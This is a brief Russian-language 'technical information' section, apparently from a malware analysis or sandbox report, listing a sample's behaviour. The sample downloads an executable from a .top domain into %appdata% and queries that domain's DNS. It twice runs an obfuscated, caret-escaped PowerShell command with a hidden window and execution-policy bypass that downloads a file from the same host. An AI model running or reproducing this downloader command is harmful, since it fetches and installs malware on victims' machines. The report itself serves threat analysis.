Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWe^RSheLL.^E^x^E -ExECuTI^OnPOl^ICY by^pA^SS -NoprOfI^L^E -^wI^NdowstYle H^idD^E^N ^(NEw^-oBJeC^t^ s^y^S^tEm^.^NeT.wE^B^C^LIenT^).^DOWN^LO^a^DFi^Le('http://smoeroota.top/rea...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "poWe^RSheLL.^E^x^E -ExECuTI^OnPOl^ICY by^pA^SS -NoprOfI^L^E -^wI^NdowstYle H^idD^E^N ^(NEw^-oBJeC^t^ s^y^S^tEm^.^NeT.wE^B^C^LIenT^).^DOWN^LO^a^DFi^Le('http://smoeroota.top/rea...' (со скрытым окном)